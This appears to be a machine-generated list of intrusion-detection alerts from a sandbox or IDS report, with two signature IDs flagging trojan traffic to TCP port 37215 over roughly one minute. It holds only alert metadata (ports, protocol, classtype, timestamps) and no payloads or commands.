          SID:2835222
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549287
          SID:2835222
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590916
          SID:2829579
          Source Port:60244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.507827
          SID:2829579
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426577
          SID:2829579
          Source Port:43174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.982884
          SID:2829579
          Source Port:53916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728470
          SID:2835222
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.356862
          SID:2835222
          Source Port:50874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.373605
          SID:2829579
          Source Port:58852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337577
          SID:2835222
          Source Port:37360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488364
          SID:2829579
          Source Port:42890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213429
          SID:2835222
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.903471
          SID:2835222
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178453
          SID:2829579
          Source Port:42090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266277
          SID:2835222
          Source Port:39834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959632
          SID:2835222
          Source Port:51790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487380
          SID:2829579
          Source Port:47602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891087
          SID:2835222
          Source Port:37590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.737352
          SID:2835222
          Source Port:38718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812865
          SID:2829579
          Source Port:40852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861701
          SID:2829579
          Source Port:43966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.277944
          SID:2829579
          Source Port:53298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341788
          SID:2829579
          Source Port:38304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867495
          SID:2829579
          Source Port:43946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.629277
          SID:2829579
          Source Port:56892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793310
          SID:2829579
          Source Port:34712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.025706
          SID:2829579
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266710
          SID:2835222
          Source Port:40682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547518
          SID:2835222
          Source Port:33712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142046
          SID:2829579
          Source Port:52592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267009
          SID:2829579
          Source Port:55114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437430
          SID:2829579
          Source Port:43732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843571
          SID:2835222
          Source Port:40472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491394
          SID:2835222
          Source Port:45676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921273
          SID:2835222
          Source Port:53478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403221
          SID:2835222
          Source Port:42322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813024
          SID:2835222
          Source Port:34194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195313
          SID:2829579
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797130
          SID:2829579
          Source Port:35452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542352
          SID:2835222
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650248
          SID:2829579
          Source Port:34812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084812
          SID:2829579
          Source Port:48534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299506
          SID:2829579
          Source Port:49554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870729
          SID:2835222
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935275
          SID:2829579
          Source Port:43642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941290
          SID:2835222
          Source Port:53406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102800
          SID:2835222
          Source Port:57810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542254
          SID:2835222
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.889432
          SID:2835222
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474658
          SID:2829579
          Source Port:60768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893282
          SID:2829579
          Source Port:52102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671736
          SID:2835222
          Source Port:43776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914774
          SID:2829579
          Source Port:52672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020589
          SID:2835222
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196792
          SID:2829579
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213755
          SID:2835222
          Source Port:46562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287853
          SID:2835222
          Source Port:56578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186040
          SID:2835222
          Source Port:58558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728008
          SID:2829579
          Source Port:44702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112979
          SID:2829579
          Source Port:47598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337577
          SID:2835222
          Source Port:45008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415857
          SID:2829579
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268085
          SID:2835222
          Source Port:45626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112900
          SID:2829579
          Source Port:42782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794919
          SID:2835222
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735850
          SID:2829579
          Source Port:49298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039608
          SID:2829579
          Source Port:51130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976090
          SID:2835222
          Source Port:44776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.699111
          SID:2829579
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708412
          SID:2829579
          Source Port:54254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.963930
          SID:2829579
          Source Port:33520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997352
          SID:2835222
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271976
          SID:2835222
          Source Port:51042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543627
          SID:2835222
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741646
          SID:2835222
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.755884
          SID:2829579
          Source Port:58400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298491
          SID:2829579
          Source Port:33712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332710
          SID:2829579
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592804
          SID:2835222
          Source Port:44288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203750
          SID:2835222
          Source Port:48056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173678
          SID:2835222
          Source Port:48076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185871
          SID:2829579
          Source Port:37698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272359
          SID:2829579
          Source Port:54432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161091
          SID:2829579
          Source Port:42208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161632
          SID:2835222
          Source Port:55808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.910208
          SID:2829579
          Source Port:60330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084860
          SID:2829579
          Source Port:53618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245653
          SID:2835222
          Source Port:45826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923066
          SID:2829579
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183104
          SID:2835222
          Source Port:55498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437120
          SID:2835222
          Source Port:53794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.287660
          SID:2835222
          Source Port:59202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474239
          SID:2835222
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958846
          SID:2829579
          Source Port:34792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201372
          SID:2829579
          Source Port:42854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269645
          SID:2835222
          Source Port:51090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663288
          SID:2829579
          Source Port:36260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711380
          SID:2829579
          Source Port:45368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845775
          SID:2835222
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157000
          SID:2835222
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852787
          SID:2835222
          Source Port:53686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213869
          SID:2829579
          Source Port:48200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605629
          SID:2829579
          Source Port:55488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237080
          SID:2829579
          Source Port:51552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664956
          SID:2829579
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482962
          SID:2835222
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.172033
          SID:2835222
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103007
          SID:2829579
          Source Port:38020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804904
          SID:2829579
          Source Port:43336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214876
          SID:2829579
          Source Port:58090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591197
          SID:2835222
          Source Port:39328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.816197
          SID:2829579
          Source Port:59396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170351
          SID:2829579
          Source Port:60488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680191
          SID:2829579
          Source Port:41344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793560
          SID:2829579
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102177
          SID:2829579
          Source Port:51164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551708
          SID:2835222
          Source Port:43656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557300
          SID:2835222
          Source Port:56946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298564
          SID:2829579
          Source Port:44558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436172
          SID:2835222
          Source Port:46568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.697000
          SID:2835222
          Source Port:39168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.094031
          SID:2829579
          Source Port:45988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724172
          SID:2835222
          Source Port:43546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.241625
          SID:2829579
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.295390
          SID:2835222
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126804
          SID:2829579
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342018
          SID:2829579
          Source Port:37722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298924
          SID:2829579
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.875972
          SID:2829579
          Source Port:36564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177207
          SID:2829579
          Source Port:52526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868754
          SID:2829579
          Source Port:52764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807300
          SID:2835222
          Source Port:47314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298281
          SID:2835222
          Source Port:39314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.319101
          SID:2829579
          Source Port:52766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534681
          SID:2829579
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536756
          SID:2829579
          Source Port:45592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123859
          SID:2829579
          Source Port:43940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923244
          SID:2835222
          Source Port:56920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233048
          SID:2835222
          Source Port:49216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797782
          SID:2835222
          Source Port:33114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923038
          SID:2829579
          Source Port:58098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272375
          SID:2835222
          Source Port:53780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.716091
          SID:2829579
          Source Port:36854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549427
          SID:2835222
          Source Port:59498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061243
          SID:2829579
          Source Port:56466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268626
          SID:2835222
          Source Port:39496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336650
          SID:2835222
          Source Port:43858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270295
          SID:2829579
          Source Port:49284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977394
          SID:2835222
          Source Port:50110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480917
          SID:2835222
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.112922
          SID:2835222
          Source Port:49050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867572
          SID:2829579
          Source Port:47420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189081
          SID:2829579
          Source Port:49912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196325
          SID:2829579
          Source Port:35264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330011
          SID:2829579
          Source Port:43272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234699
          SID:2829579
          Source Port:52010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.076119
          SID:2835222
          Source Port:39248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046949
          SID:2829579
          Source Port:44808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665197
          SID:2829579
          Source Port:46264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324045
          SID:2835222
          Source Port:41270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987924
          SID:2835222
          Source Port:46866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205623
          SID:2829579
          Source Port:41440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039568
          SID:2835222
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033163
          SID:2835222
          Source Port:58962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325755
          SID:2835222
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414707
          SID:2835222
          Source Port:44968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.772844
          SID:2835222
          Source Port:47504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298772
          SID:2829579
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268459
          SID:2835222
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111318
          SID:2835222
          Source Port:42510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116821
          SID:2835222
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.812797
          SID:2835222
          Source Port:58106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543662
          SID:2829579
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.236389
          SID:2835222
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241510
          SID:2829579
          Source Port:41798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213437
          SID:2829579
          Source Port:54492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547840
          SID:2829579
          Source Port:42394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.165005
          SID:2835222
          Source Port:55162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268607
          SID:2835222
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291697
          SID:2829579
          Source Port:37142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.045901
          SID:2835222
          Source Port:54460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117037
          SID:2835222
          Source Port:56414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272001
          SID:2829579
          Source Port:39148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496673
          SID:2829579
          Source Port:49596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.183130
          SID:2829579
          Source Port:56244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201156
          SID:2829579
          Source Port:55212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630020
          SID:2829579
          Source Port:55040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174095
          SID:2829579
          Source Port:38018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528090
          SID:2829579
          Source Port:35090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267565
          SID:2829579
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845751
          SID:2829579
          Source Port:51148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400952
          SID:2829579
          Source Port:44262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843357
          SID:2829579
          Source Port:53684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890198
          SID:2835222
          Source Port:60964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466290
          SID:2829579
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988654
          SID:2829579
          Source Port:34404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287631
          SID:2829579
          Source Port:59052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064385
          SID:2829579
          Source Port:57018
          Destination Port:37215
